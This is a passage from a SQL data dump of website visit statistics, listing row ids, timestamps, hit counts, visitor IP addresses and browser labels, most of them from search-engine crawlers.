,0,'87.250.224.65','other'),(327853,1541677819,1,1,0,0,'54.36.149.66','other'),(327854,1541677825,1,1,0,0,'178.154.244.29','other'),(327855,1541677827,1,1,0,0,'54.36.149.54','other'),(327856,1541677851,1,1,0,0,'178.154.244.11','other'),(327857,1541678020,1,1,0,0,'157.55.39.243','other'),(327858,1541678208,1,1,0,0,'54.36.148.28','other'),(327859,1541678237,1,1,0,0,'95.163.255.108','other'),(327860,1541678243,1,1,0,0,'95.163.255.119','other'),(327861,1541678327,1,1,0,0,'66.249.66.155','chrome'),(327862,1541678332,1,1,0,0,'216.244.66.241','other'),(327863,1541678355,1,1,0,0,'66.249.66.156','chrome'),(327864,1541678456,1,1,0,0,'54.36.148.189','other'),(327865,1541678523,1,1,0,0,'54.36.149.75','other'),(327866,1541678583,1,1,0,0,'54.36.148.60','other'),(327867,1541678648,1,1,0,0,'54.36.148.169','other'),(327868,1541678658,1,1,0,0,'54.36.148.114','other'),(327869,1541678720,1,1,0,0,'54.36.148.112','other'),(327870,1541678746,1,1,0,0,'66.249.66.154','chrome'),(327871,1541678872,2,2,0,0,'91.196.177.46','firefox'),(327872,1541678928,1,1,0,0,'54.36.148.166','other'),(327873,1541679007,1,1,0,0,'130.180.216.124','chrome'),(327874,1541679110,1,1,0,0,'54.36.148.138','other'),(327875,1541679113,1,1,0,0,'54.36.149.40','other'),(327876,1541679384,1,1,0,0,'54.36.148.152','other'),(327877,1541679619,1,1,0,0,'54.36.149.74','other'),(327878,1541679640,1,1,0,0,'54.36.149.96','other'),(327879,1541679737,1,1,0,0,'54.36.149.77','other'),(327880,1541679796,1,1,0,0,'54.36.148.200','other'),(327881,1541680018,1,1,0,0,'54.36.148.93','other'),(327882,1541680254,2,2,0,0,'91.196.178.93','chrome'),(327883,1541680277,1,1,0,0,'54.36.149.51','other'),(327884,1541680317,1,1,0,0,'37.54.40.30','chrome'),(327885,1541680381,1,1,0,0,'54.36.149.83','other'),(327886,1541680432,1,1,0,0,'66.249.66.157','chrome'),(327887,1541680461,1,1,0,0,'66.249.66.156','chrome'),(327888,1541680521,1,1,0,0,'54.36.148.31','other'),(327889,1541680531,1,1,0,0,'54.36.148.188','other'),(327890,1541680632,1,1,0,0,'91.250.23.106','chrome'),(327891,1541680798,1,1,0,0,'54.36.149.99','other'),(327892,1541681026,1,1,0,0,'67.231.16.206','other'),(327893,1541681040,1,1,0,0,'8.29.198.27','other'),(327894,1541681175,2,2,0,0,'46.229.168.135','other'),(327895,1541681202,1,1,0,0,'54.36.148.247','other'),(327896,1541681226,1,1,0,0,'54.36.148.193','other'),(327897,1541681247,1,1,0,0,'66.249.66.154','chrome'),(327898,1541681777,2,2,0,0,'91.196.178.93','chrome'),(327899,1541681903,1,1,0,0,'46.229.168.152','other'),(327900,1541681904,1,1,0,0,'54.36.149.35','other'),(327901,1541681955,1,1,0,0,'178.92.153.178','firefox'),(327902,1541682132,1,1,0,0,'141.105.135.202','chrome'),(327903,1541682147,1,1,0,0,'66.249.66.156','chrome'),(327904,1541682191,2,2,0,0,'66.249.66.152','chrome'),(327905,1541682229,2,2,0,0,'66.249.66.155','chrome'),(327906,1541682246,1,1,0,0,'66.249.66.154','chrome'),(327907,1541682299,1,1,0,0,'66.249.66.59','chrome'),(327908,1541682336,1,1,0,0,'66.249.66.44','chrome'),(327909,1541682454,4,4,0,0,'207.46.13.190','other'),(327910,1541682728,1,1,0,0,'54.36.149.37','other'),(327911,1541682730,2,2,0,0,'95.132.12.98','firefox'),(327912,1541682822,2,2,0,0,'91.196.178.93','chrome'),(327913,1541682829,5,5,0,0,'216.244.66.241','other'),(327914,1541682847,1,1,0,0,'8.29.198.25','other'),(327915,1541682935,1,1,0,0,'54.36.148.14','other'),(327916,1541683150,1,1,0,0,'8.29.198.26','other'),(327917,1541683291,1,1,0,0,'54.36.148.103','other'),(327918,1541683461,1,1,0,0,'54.36.148.175','other'),(327919,1541683699,1,1,0,0,'95.163.255.99','other'),(327920,1541683702,1,1,0,0,'95.163.255.92','other'),(327921,1541683862,2,2,0,0,'176.120.111.129','chrome'),(327922,1541683933,1,1,0,0,'46.229.168.144','other'),(327923,1541683935,1,1,0,0,'46.229.168.153','other'),(327924,1541683962,1,1,0,0,'54.36.148.246','other'),(327925,1541683997,1,1,0,0,'54.36.148.22','other'),(327926,1541684027,2,2,0,0,'207.46.13.190','other'),(327927,1541684234,3,3,0,0,'91.196.178.100','chrome'),(327928,1541684405,1,1,0,0,'54.36.149.16','other'),(327929,1541684533,1,1,0,0,'66.249.66.42','chrome'),(327930,1541684558,1,1,0,0,'46.229.168.137','other'),(327931,1541684560,1,1,0,0,'46.229.168.147','other'),(327932,1541684747,1,1,0,0,'178.95.246.220','chrome'),(327933,1541684796,1,1,0,0,'46.211.74.233','chrome'),(327934,1541684903,1,1,0,0,'193.0.218.65','chrome'),(327935,1541685029,2,2,0,0,'54.36.149.45','other'),(327936,1541685135,2,2,0,0,'66.249.66.157','chrome'),(327938,1541685201,1,1,0,0,'216.244.66.241','other'),(327939,1541685311,3,3,0,0,'66.249.66.156','chrome'),(327940,1541685312,3,3,0,0,'66.249.66.154','chrome'),(327941,1541685370,1,1,0,0,'91.196.178.100','chrome'),(327942,1541685506,2,2,0,0,'66.249.66.152','chrome'),(327943,1541685514,1,1,0,0,'66.249.66.155','chrome'),(327944,1541686128,1,1,0,0,'216.244.66.241','other'),(327945,1541686188,1,1,0,0,'54.36.148.115','other'),(327946,1541686567,1,1,0,0,'91.196.178.93','chrome'),(327947,1541686764,1,1,0,0,'54.36.148.177','other'),(327948,1541686778,1,1,0,0,'54.36.148.78','other'),(327949,1541686989,1,1,0,0,'66.249.66.152','chrome'),(327950,1541687006,1,1,0,0,'54.36.148.57','other'),(327951,1541687161,1,1,0,0,'54.36.148.197','other'),(327952,1541687503,1,1,0,0,'54.36.148.105','other'),(327953,1541687578,1,1,0,0,'54.36.149.4','other'),(327954,1541687594,1,1,0,0,'54.36.148.161','other'),(327955,1541687694,2,2,0,0,'91.196.178.133','firefox'),(327956,1541687704,1,1,0,0,'54.36.149.6','other'),(327957,1541688178,1,1,0,0,'54.36.148.195','other'),(327958,1541688228,1,1,0,0,'54.36.149.13','other'),(327959,1541688278,1,1,0,0,'54.36.148.98','other'),(327960,1541688559,2,2,0,0,'91.196.177.207','chrome'),(327961,1541688669,1,1,0,0,'54.36.148.222','other'),(327962,1541688677,3,3,0,0,'216.244.66.241','other'),(327963,1541688939,1,1,0,0,'46.229.168.137','other'),(327964,1541688942,1,1,0,0,'46.229.168.143','other'),(327965,1541688972,1,1,0,0,'66.249.66.156','chrome'),(327966,1541688984,1,1,0,0,'66.249.66.152','chrome'),(327967,1541688994,1,1,0,0,'54.36.148.147','other'),(327968,1541689158,1,1,0,0,'54.36.149.52','other'),(327969,1541689343,1,1,0,0,'66.249.66.40','chrome'),(327970,1541689399,2,2,0,0,'91.196.178.93','chrome'),(327971,1541689527,1,1,0,0,'54.36.149.86','other'),(327972,1541689934,1,1,0,0,'66.249.66.157','chrome'),(327973,1541690003,1,1,0,0,'66.249.66.156','chrome'),(327974,1541690091,1,1,0,0,'91.196.178.135','chrome'),(327975,1541690136,2,2,0,0,'178.154.244.29','other'),(327976,1541690137,1,1,0,0,'5.45.207.19','other'),(327978,1541690740,4,4,0,0,'216.244.66.241','other'),(327979,1541691248,1,1,0,0,'54.36.148.85','other'),(327980,1541691429,1,1,0,0,'157.55.39.152','other'),(327981,1541691628,1,1,0,0,'95.108.213.4','other'),(327982,1541691685,1,1,0,0,'141.8.132.16','other'),(327983,1541691749,2,2,0,0,'178.154.244.29','other'),(327984,1541691753,3,3,0,0,'5.45.207.19','other'),(327985,1541691786,2,2,0,0,'5.45.207.79','other'),(327986,1541691862,1,1,0,0,'54.36.148.183','other'),(327987,1541691904,1,1,0,0,'178.154.171.27','other'),(327988,1541691907,1,1,0,0,'8.29.198.25','other'),(327989,1541691922,3,3,0,0,'66.249.66.155','chrome'),(327990,1541691943,1,1,0,0,'54.36.148.100','other'),(327991,1541692005,2,2,0,0,'66.249.66.152','chrome'),(327992,1541692007,3,3,0,0,'178.154.244.11','other'),(327993,1541692047,1,1,0,0,'66.249.66.156','chrome'),(327994,1541692068,1,1,0,0,'54.36.148.18','other'),(327995,1541692428,1,1,0,0,'54.36.149.77','other'),(327996,1541692973,1,1,0,0,'54.36.149.101','other'),(327997,1541693232,1,1,0,0,'54.36.149.58','other'),(327998,1541693330,1,1,0,0,'54.36.149.103','other'),(327999,1541693422,1,1,0,0,'54.36.148.235','other'),(328000,1541693473,1,1,0,0,'54.36.148.99','other'),(328001,1541693479,1,1,0,0,'62.205.134.182','msie'),(328002,1541693687,1,1,0,0,'8.29.198.27','other'),(328003,1541693699,1,1,0,0,'54.36.148.133','other'),(328004,1541693797,1,1,0,0,'178.154.244.29','other'),(328005,1541693843,1,1,0,0,'46.229.168.152','other'),(328006,1541693866,1,1,0,0,'54.36.148.30','other'),(328007,1541693917,1,1,0,0,'95.163.255.93','other'),(328008,1541693922,1,1,0,0,'95.163.255.96','other'),(328009,1541694020,1,1,0,0,'46.229.168.142','other'),(328010,1541694021,1,1,0,0,'8.29.198.26','other'),(328011,1541694023,1,1,0,0,'46.229.168.138','other'),(328012,1541694094,3,3,0,0,'216.244.66.241','other'),(328013,1541694124,1,1,0,0,'54.36.149.61','other'),(328014,1541694361,1,1,0,0,'54.36.149.58','other'),(328015,1541694658,1,1,0,0,'54.36.148.183','other'),(328016,1541695091,1,1,0,0,'54.36.149.47','other'),(328017,1541695098,1,1,0,0,'54.36.148.11','other'),(328018,1541695218,1,1,0,0,'54.36.149.77','other'),(328019,1541695259,1,1,0,0,'54.36.148.179','other'),(328020,1541695423,1,1,0,0,'157.55.39.243','other'),(328021,1541695531,1,1,0,0,'66.249.66.57','chrome'),(328022,1541695546,1,1,0,0,'66.249.66.42','chrome'),(328023,1541695561,8,8,0,0,'216.244.66.241','other'),(328024,1541695758,2,2,0,0,'188.191.97.152','firefox'),(328025,1541695887,1,1,0,0,'62.205.134.182','msie'),(328026,1541695980,54,54,0,0,'144.76.71.176','other'),(328027,1541696075,1,1,0,0,'54.36.149.104','other'),(328028,1541696493,2,2,0,0,'66.249.66.156','chrome'),(328029,1541696512,1,1,0,0,'66.249.66.154','chrome'),(328030,1541696533,1,1,0,0,'216.244.66.241','other'),(328031,1541696670,1,1,0,0,'54.36.148.201','other'),(328032,1541696711,1,1,0,0,'54.36.149.3','other'),(328033,1541696856,2,2,0,0,'178.154.244.29','other'),(328034,1541696901,1,1,0,0,'66.249.66.152','chrome'),(328035,1541697301,1,1,0,0,'54.36.148.184','other'),(328036,1541697368,1,1,0,0,'54.36.148.106','other'),(328037,1541697560,1,1,0,0,'54.36.148.223','other'),(328038,1541697678,1,1,0,0,'66.249.66.155','chrome'),(328039,1541697733,1,1,0,0,'66.249.66.154','chrome'),(328040,1541698204,1,1,0,0,'54.36.149.40','other'),(328041,1541698325,1,1,0,0,'54.36.148.118','other'),(328042,1541698458,3,3,0,0,'216.244.66.241','other'),(328043,1541698534,1,1,0,0,'54.36.149.82','other'),(328044,1541698822,1,1,0,0,'54.36.148.138','other'),(328045,1541698973,2,2,0,0,'66.249.66.157','chrome'),(328046,1541698991,2,2,0,0,'66.249.66.152','chrome'),(328047,1541699099,1,1,0,0,'54.36.148.134','other'),(328048,1541699100,1,1,0,0,'54.36.148.13','other'),(328049,1541699334,1,1,0,0,'157.55.39.243','other'),(328050,1541699393,1,1,0,0,'54.36.148.233','other'),(328051,1541699476,1,1,0,0,'54.165.59.7','other'),(328052,1541699480,1,1,0,0,'54.36.149.40','other'),(328053,1541699559,1,1,0,0,'54.36.148.48','other'),(328054,1541699784,2,2,0,0,'66.249.66.156','chrome'),(328055,1541699970,1,1,0,0,'54.36.149.80','other'),(328056,1541700320,1,1,0,0,'54.36.148.135','other'),(328057,1541700482,1,1,0,0,'54.36.148.96','other'),(328058,1541700656,1,1,0,0,'54.36.148.127','other'),(328059,1541700766,1,1,0,0,'54.36.149.19','other'),(328060,1541700784,1,1,0,0,'66.249.66.57','chrome'),(328061,1541700814,1,1,0,0,'66.249.66.40','chrome'),(328062,1541701232,1,1,0,0,'54.36.149.85','other'),(328063,1541701361,1,1,0,0,'216.244.66.241','other'),(328064,1541701432,1,1,0,0,'66.249.66.152','chrome'),(328065,1541701442,1,1,0,0,'95.163.255.92','other'),(328066,1541701445,1,1,0,0,'95.163.255.98','other'),(328067,1541701560,1,1,0,0,'54.36.149.52','other'),(328068,1541701735,1,1,0,0,'54.36.149.33','other'),(328069,1541702144,1,1,0,0,'54.36.148.248','other'),(328070,1541702218,1,1,0,0,'54.36.148.124','other'),(328071,1541702222,2,2,0,0,'46.211.27.49','chrome'),(328072,1541702453,1,1,0,0,'157.55.39.152','other'),(328073,1541702462,1,1,0,0,'54.36.148.192','other'),(328074,1541702785,1,1,0,0,'8.29.198.27','other'),(328075,1541703125,1,1,0,0,'54.36.149.101','other'),(328076,1541703298,1,1,0,0,'54.36.148.182','other'),(328077,1541703362,2,2,0,0,'66.249.66.156','chrome'),(328078,1541703363,1,1,0,0,'66.249.66.152','chrome'),(328079,1541703431,1,1,0,0,'54.36.148.246','other'),(328080,1541703532,1,1,0,0,'54.36.148.68','other'),(328081,1541703649,1,1,0,0,'54.36.148.203','other'),(328082,1541703729,1,1,0,0,'54.36.148.85','other'),(328083,1541703759,3,3,0,0,'216.244.66.241','other'),(328084,1541703799,1,1,0,0,'54.36.148.165','other'),(328085,1541704325,1,1,0,0,'54.36.148.86','other'),(328086,1541704487,1,1,0,0,'207.46.13.190','other'),(328087,1541704544,1,1,0,0,'8.29.198.25','other'),(328088,1541704649,1,1,0,0,'54.36.149.59','other'),(328089,1541704726,1,1,0,0,'66.249.66.42','chrome'),(328090,1541704758,1,1,0,0,'46.229.168.144','other'),(328091,1541704790,1,1,0,0,'54.36.148.131','other'),(328092,1541704880,1,1,0,0,'46.229.168.149','other'),(328093,1541704904,1,1,0,0,'8.29.198.26','other'),(328094,1541704936,1,1,0,0,'54.36.148.181','other'),(328095,1541705219,1,1,0,0,'54.36.148.213','other'),(328096,1541705238,1,1,0,0,'54.36.149.77','other'),(328097,1541705258,1,1,0,0,'66.249.66.155','chrome'),(328098,1541705259,1,1,0,0,'66.249.66.152','chrome'),(328099,1541705307,2,2,0,0,'157.55.39.243','other'),(328100,1541705517,1,1,0,0,'159.205.229.197','chrome'),(328101,1541705591,1,1,0,0,'54.36.148.199','other'),(328102,1541705699,6,6,0,0,'5.45.207.79','other'),(328103,1541705787,1,1,0,0,'82.145.208.248','other'),(328104,1541705800,1,1,0,0,'54.36.148.113','other'),(328105,1541705837,5,5,0,0,'178.154.244.11','other'),(328106,1541705955,1,1,0,0,'54.36.149.24','other'),(328107,1541706021,1,1,0,0,'54.36.148.47','other'),(328108,1541706259,1,1,0,0,'54.36.149.81','other'),(328109,1541706324,1,1,0,0,'54.36.148.64','other'),(328110,1541706384,1,1,0,0,'5.45.207.19','other'),(328111,1541706461,3,3,0,0,'178.154.244.29','other'),(328112,1541706504,1,1,0,0,'95.132.13.92','chrome'),(328113,1541706538,1,1,0,0,'54.36.148.149','other'),(328114,1541706607,1,1,0,0,'54.36.149.66','other'),(328115,1541706628,1,1,0,0,'54.36.148.148','other'),(328116,1541706775,5,5,0,0,'178.154.244.11','other'),(328117,1541706863,1,1,0,0,'216.244.66.241','other'),(328118,1541706923,1,1,0,0,'66.249.66.61','chrome'),(328119,1541706956,1,1,0,0,'66.249.66.42','chrome'),(328120,1541706985,1,1,0,0,'66.249.66.156','chrome'),(328121,1541707355,1,1,0,0,'66.249.66.152','chrome'),(328122,1541707730,1,1,0,0,'54.36.148.234','other'),(328123,1541708057,1,1,0,0,'54.36.148.210','other'),(328124,1541708329,1,1,0,0,'54.36.148.187','other'),(328125,1541708330,1,1,0,0,'54.36.148.18','other'),(328126,1541708487,1,1,0,0,'54.36.149.90','other'),(328127,1541708736,1,1,0,0,'66.249.66.156','chrome'),(328128,1541709023,1,1,0,0,'54.36.148.111','other'),(328129,1541709111,1,1,0,0,'54.36.148.14','other'),(328130,1541709195,1,1,0,0,'66.249.66.157','chrome'),(328131,1541709196,2,2,0,0,'66.249.66.154','chrome'),(328132,1541709340,1,1,0,0,'54.36.148.24','other'),(328133,1541709403,1,1,0,0,'54.36.149.48','other'),(328134,1541709441,1,1,0,0,'54.36.148.135','other'),(328135,1541709483,1,1,0,0,'216.244.66.241','other'),(328136,1541709835,1,1,0,0,'51.255.65.46','other'),(328137,1541709977,1,1,0,0,'54.36.148.138','other'),(328138,1541710086,1,1,0,0,'66.249.66.156','chrome'),(328139,1541710616,1,1,0,0,'46.229.168.136','other'),(328140,1541710620,1,1,0,0,'46.229.168.145','other'),(328141,1541711056,1,1,0,0,'46.229.168.144','other'),(328142,1541711123,1,1,0,0,'92.113.95.165','chrome'),(328143,1541711131,1,1,0,0,'54.36.149.74','other'),(328144,1541711310,3,3,0,0,'216.244.66.241','other'),(328145,1541711375,1,1,0,0,'54.36.148.233','other'),(328146,1541711551,1,1,0,0,'13.66.139.0','other'),(328147,1541711692,2,2,0,0,'178.92.171.161','chrome'),(328148,1541711762,1,1,0,0,'54.36.149.49','other'),(328149,1541712204,1,1,0,0,'54.36.149.41','other'),(328150,1541712318,3,3,0,0,'216.244.66.241','other'),(328151,1541712620,1,1,0,0,'95.163.255.92','other'),(328152,1541712630,1,1,0,0,'95.163.255.97','other'),(328153,1541712746,1,1,0,0,'54.36.148.25','other'),(328154,1541712806,2,2,0,0,'91.209.11.236','other'),(328155,1541713032,1,1,0,0,'54.36.148.147','other'),(328156,1541713096,1,1,0,0,'66.249.66.44','chrome'),(328157,1541713153,1,1,0,0,'54.36.148.204','other'),(328158,1541713441,2,2,0,0,'92.113.188.255','other'),(328159,1541713649,1,1,0,0,'8.29.198.25','other'),(328160,1541713837,1,1,0,0,'54.36.148.23','other'),(328161,1541713963,1,1,0,0,'54.36.148.12','other'),(328162,1541713982,1,1,0,0,'91.242.162.54','other'),(328163,1541714051,1,1,0,0,'54.36.148.173','other'),(328164,1541714083,1,1,0,0,'54.36.148.28','other'),(328165,1541714120,2,2,0,0,'216.244.66.241','other'),(328166,1541714402,14,14,0,0,'144.76.119.201','other'),(328167,1541714508,1,1,0,0,'51.255.65.46','other'),(328168,1541714531,1,1,0,0,'54.36.149.31','other'),(328169,1541714719,1,1,0,0,'54.36.148.43','other'),(328170,1541714805,1,1,0,0,'54.36.148.198','other'),(328171,1541714917,1,1,0,0,'54.36.148.68','other'),(328172,1541715012,1,1,0,0,'66.249.66.156','chrome'),(328173,1541715020,1,1,0,0,'66.249.66.154','chrome'),(328174,1541715073,1,1,0,0,'54.36.149.17','other'),(328175,1541715386,2,2,0,0,'8.29.198.25','other'),(328176,1541715481,1,1,0,0,'157.55.39.243','other'),(328177,1541715856,1,1,0,0,'54.36.148.246','other'),(328178,1541715867,1,1,0,0,'54.36.148.13','other'),(328179,1541716242,1,1,0,0,'46.229.168.130','other'),(328180,1541716275,1,1,0,0,'46.229.168.145','other'),(328181,1541716471,1,1,0,0,'54.36.148.250','other'),(328182,1541716539,1,1,0,0,'54.36.148.187','other'),(328183,1541716572,1,1,0,0,'54.36.149.64','other'),(328184,1541716655,1,1,0,0,'54.36.149.57','other'),(328185,1541716888,5,5,0,0,'216.244.66.241','other'),(328186,1541717212,1,1,0,0,'54.36.148.159','other'),(328187,1541717485,1,1,0,0,'54.36.148.145','other'),(328188,1541717487,1,1,0,0,'66.249.66.19','chrome'),(328189,1541717595,1,1,0,0,'54.36.148.60','other'),(328190,1541717976,1,1,0,0,'180.76.15.159','other'),(328191,1541718053,1,1,0,0,'54.36.149.97','other'),(328192,1541718282,1,1,0,0,'54.36.148.138','other'),(328193,1541718429,1,1,0,0,'54.36.148.196','other'),(328194,1541718556,1,1,0,0,'54.36.148.90','other'),(328195,1541718885,1,1,0,0,'54.36.149.69','other'),(328196,1541718955,1,1,0,0,'54.36.148.255','other'),(328197,1541719325,1,1,0,0,'54.36.148.231','other'),(328198,1541719862,1,1,0,0,'66.249.66.22','chrome'),(328199,1541719976,1,1,0,0,'180.76.15.156','other'),(328200,1541719977,1,1,0,0,'180.76.15.18','other'),(328201,1541720060,1,1,0,0,'54.36.149.72','other'),(328202,1541720110,1,1,0,0,'54.36.149.82','other'),(328203,1541720150,1,1,0,0,'54.36.148.29','other'),(328204,1541720151,1,1,0,0,'216.244.66.241','other'),(328205,1541720348,2,2,0,0,'178.154.244.29','other'),(328206,1541720913,1,1,0,0,'207.46.13.190','other'),(328207,1541721182,1,1,0,0,'80.95.44.47','chrome'),(328208,1541721319,1,1,0,0,'62.205.134.182','other'),(328209,1541721783,4,4,0,0,'216.244.66.241','other'),(328210,1541721897,1,1,0,0,'207.46.13.190','other'),(328211,1541721985,1,1,0,0,'46.229.168.145','other'),(328212,1541721987,1,1,0,0,'46.229.168.135','other'),(328213,1541722332,1,1,0,0,'46.229.168.139','other'),(328214,1541722413,1,1,0,0,'178.154.171.27','other'),(328215,1541722439,1,1,0,0,'157.55.39.243','other'),(328216,1541722819,1,1,0,0,'66.249.66.155','chrome'),(328217,1541722856,1,1,0,0,'66.249.66.152','chrome'),(328218,1541723008,1,1,0,0,'62.205.134.182','msie'),(328221,1541723083,1,1,0,0,'46.42.143.52','msie'),(328222,1541723517,1,1,0,0,'54.36.149.36','other'),(328223,1541723695,1,1,0,0,'54.36.148.210','other'),(328224,1541723756,1,1,0,0,'157.55.39.243','other'),(328225,1541723837,1,1,0,0,'95.163.255.98','other'),(328226,1541723841,1,1,0,0,'95.163.255.99','other'),(328227,1541724231,1,1,0,0,'66.249.66.22','chrome'),(328228,1541724238,1,1,0,0,'54.36.148.29','other'),(328229,1541724285,1,1,0,0,'54.36.149.1','other'),(328230,1541724296,1,1,0,0,'66.249.66.152','chrome'),(328231,1541724516,1,1,0,0,'8.29.198.25','other'),(328232,1541724648,1,1,0,0,'54.36.149.99','other'),(328233,1541725096,4,4,0,0,'216.244.66.241','other'),(328234,1541725142,1,1,0,0,'54.36.149.43','other'),(328235,1541725334,1,1,0,0,'54.36.148.32','other'),(328236,1541725539,1,1,0,0,'54.36.148.213','other'),(328237,1541725571,1,1,0,0,'54.36.148.176','other'),(328238,1541725583,1,1,0,0,'54.36.148.249','other'),(328239,1541725640,1,1,0,0,'54.36.148.219','other'),(328240,1541725675,1,1,0,0,'54.36.148.204','other'),(328241,1541726223,2,2,0,0,'8.29.198.27','other'),(328242,1541726439,1,1,0,0,'46.229.168.144','other'),(328243,1541726440,1,1,0,0,'46.229.168.137','other'),(328244,1541726909,1,1,0,0,'54.36.148.162','other'),(328245,1541727145,1,1,0,0,'54.36.148.146','other'),(328246,1541727273,1,1,0,0,'54.36.148.131','other'),(328247,1541727697,1,1,0,0,'54.36.148.174','other'),(328248,1541727776,1,1,0,0,'178.154.244.29','other'),(328249,1541727781,1,1,0,0,'216.244.66.241','other'),(328250,1541727834,1,1,0,0,'54.36.148.210','other'),(328251,1541728449,1,1,0,0,'54.36.148.69','other'),(328252,1541728827,4,4,0,0,'216.244.66.241','other'),(328253,1541728978,1,1,0,0,'54.36.149.45','other'),(328254,1541729174,1,1,0,0,'66.249.66.155','chrome'),(328255,1541729175,1,1,0,0,'66.249.66.152','chrome'),(328256,1541729183,1,1,0,0,'46.229.168.129','other'),(328257,1541729186,2,2,0,0,'46.229.168.149','other'),(328258,1541729202,1,1,0,0,'54.36.148.222','other'),(328259,1541729208,1,1,0,0,'54.36.148.101','other'),(328260,1541729210,1,1,0,0,'207.46.13.117','other'),(328261,1541729497,2,2,0,0,'66.249.66.156','chrome'),(328262,1541729597,1,1,0,0,'13.57.233.99','chrome'),(328263,1541729746,1,1,0,0,'46.229.168.138','other'),(328264,1541729749,1,1,0,0,'54.36.148.174','other'),(328265,1541729986,1,1,0,0,'54.36.148.131','other'),(328266,1541730039,1,1,0,0,'54.36.148.128','other'),(328267,1541730070,1,1,0,0,'54.36.148.35','other'),(328268,1541730136,6,6,0,0,'51.75.93.180','firefox'),(328269,1541730148,2,2,0,0,'51.75.93.180','other'),(328270,1541730236,1,0,1,0,'66.249.66.26',''),(328271,1541730237,1,0,1,0,'66.249.66.22',''),(328272,1541730313,1,1,0,0,'54.36.149.16','other'),(328273,1541730822,1,1,0,0,'66.249.66.27','chrome'),(328274,1541730905,1,1,0,0,'66.249.66.22','chrome'),(328275,1541731118,2,2,0,0,'66.249.66.152','chrome'),(328276,1541731316,1,1,0,0,'54.36.148.231','other'),(328277,1541731324,1,1,0,0,'54.36.149.102','other'),(328278,1541731805,1,1,0,0,'54.36.148.14','other'),(328279,1541731929,1,1,0,0,'157.55.39.243','other'),(328280,1541732247,1,1,0,0,'178.154.244.11','other'),(328281,1541732277,1,1,0,0,'54.36.148.75','other'),(328282,1541732354,2,2,0,0,'66.249.66.154','chrome'),(328283,1541732415,5,5,0,0,'216.244.66.241','other'),(328284,1541732456,1,1,0,0,'66.249.66.157','chrome'),(328286,1541732458,1,1,0,0,'54.36.148.144','other'),(328287,1541732477,1,1,0,0,'46.229.168.129','other'),(328288,1541732515,1,1,0,0,'66.249.66.152','other'),(328289,1541732661,3,3,0,0,'66.249.66.19','chrome'),(328290,1541732676,1,1,0,0,'207.46.13.117','other'),(328291,1541732750,1,1,0,0,'66.249.66.155','chrome'),(328292,1541732751,1,1,0,0,'66.249.66.152','chrome'),(328293,1541732866,1,1,0,0,'54.36.148.184','other'),(328294,1541732920,1,1,0,0,'66.249.66.156','chrome'),(328295,1541733009,1,1,0,0,'54.36.148.159','other'),(328296,1541733357,1,1,0,0,'66.249.66.25','chrome'),(328297,1541733424,1,1,0,0,'54.36.148.248','other'),(328298,1541733544,1,1,0,0,'54.36.149.85','other'),(328299,1541733674,1,1,0,0,'46.229.168.147','other'),(328300,1541733931,1,1,0,0,'54.36.149.61','other'),(328301,1541734044,1,1,0,0,'66.249.66.152','chrome'),(328302,1541734139,2,2,0,0,'38.145.104.18','chrome'),(328303,1541734208,1,1,0,0,'66.249.66.156','other'),(328304,1541734387,1,1,0,0,'54.36.148.18','other'),(328305,1541734391,1,1,0,0,'54.36.148.224','other'),(328306,1541734571,1,1,0,0,'54.36.148.137','other'),(328307,1541734936,1,1,0,0,'46.229.168.146','other'),(328308,1541734940,1,1,0,0,'46.229.168.133','other'),(328309,1541734943,2,2,0,0,'207.46.13.190','other'),(328310,1541735038,1,1,0,0,'54.36.149.77','other'),(328311,1541735094,2,2,0,0,'66.249.66.154','chrome'),(328312,1541735187,1,1,0,0,'66.249.66.22','chrome'),(328313,1541735269,4,4,0,0,'216.244.66.241','other'),(328314,1541735344,1,1,0,0,'46.229.168.132','other'),(328315,1541735380,1,1,0,0,'8.29.198.27','other'),(328316,1541735868,1,1,0,0,'54.36.149.104','other'),(328317,1541735875,2,2,0,0,'95.163.255.96','other'),(328318,1541735898,1,1,0,0,'54.36.149.49','other'),(328319,1541735929,1,1,0,0,'46.211.26.8','chrome'),(328320,1541736032,1,1,0,0,'54.36.149.86','other'),(328321,1541736583,1,1,0,0,'54.36.148.180','other'),(328322,1541736785,1,1,0,0,'54.36.149.88','other'),(328323,1541736950,4,4,0,0,'216.244.66.241','other'),(328324,1541737058,2,2,0,0,'8.29.198.27','other'),(328325,1541737141,1,1,0,0,'54.36.149.44','other'),(328326,1541737346,1,1,0,0,'54.36.149.89','other'),(328327,1541737422,1,1,0,0,'207.46.13.117','other'),(328328,1541737969,2,2,0,0,'46.229.168.141','other'),(328329,1541737972,1,1,0,0,'46.229.168.140','other'),(328330,1541738001,1,1,0,0,'54.36.148.215','other'),(328331,1541738024,1,1,0,0,'66.249.66.152','chrome'),(328332,1541738298,1,1,0,0,'54.36.148.242','other'),(328333,1541739015,1,1,0,0,'54.36.149.51','other'),(328334,1541739050,1,1,0,0,'207.46.13.117','other'),(328335,1541739224,1,1,0,0,'95.163.255.95','other'),(328336,1541739276,1,1,0,0,'54.36.148.16','other'),(328337,1541739617,4,4,0,0,'178.154.244.29','other'),(328338,1541739626,2,2,0,0,'37.9.113.148','other'),(328339,1541739695,1,1,0,0,'54.36.148.104','other'),(328340,1541739755,1,1,0,0,'54.36.148.115','other'),(328341,1541739756,6,6,0,0,'178.154.244.11','other'),(328342,1541739950,1,1,0,0,'157.55.39.243','other'),(328343,1541739977,3,3,0,0,'5.45.207.19','other'),(328344,1541740057,5,5,0,0,'216.244.66.241','other'),(328345,1541740235,1,1,0,0,'54.36.148.54','other'),(328346,1541740571,4,4,0,0,'178.154.244.29','other'),(328347,1541740839,1,1,0,0,'5.45.207.79','other'),(328348,1541740880,1,1,0,0,'46.229.168.142','other'),(328349,1541740980,1,1,0,0,'141.8.142.108','other'),(328350,1541741049,1,1,0,0,'66.249.66.152','chrome'),(328351,1541741249,2,2,0,0,'95.163.255.92','other'),(328352,1541741283,2,2,0,0,'54.158.240.135','other'),(328353,1541741689,1,1,0,0,'54.36.148.45','other'),(328354,1541741996,1,1,0,0,'207.46.13.117','other'),(328355,1541742056,1,1,0,0,'54.36.148.122','other'),(328356,1541742173,1,1,0,0,'54.36.148.43','other'),(328357,1541742408,10,10,0,0,'216.244.66.241','other'),(328358,1541742469,1,1,0,0,'54.36.148.35','other'),(328359,1541742888,2,2,0,0,'46.229.168.150','other'),(328360,1541742889,1,1,0,0,'46.229.168.132','other'),(328361,1541743116,1,1,0,0,'54.36.148.229','other'),(328362,1541743158,2,2,0,0,'66.249.66.156','chrome'),(328363,1541743191,1,1,0,0,'37.53.228.187','chrome'),(328364,1541743342,1,1,0,0,'54.36.148.230','other'),(328365,1541743461,1,1,0,0,'54.36.149.4','other'),(328366,1541743510,1,1,0,0,'157.55.39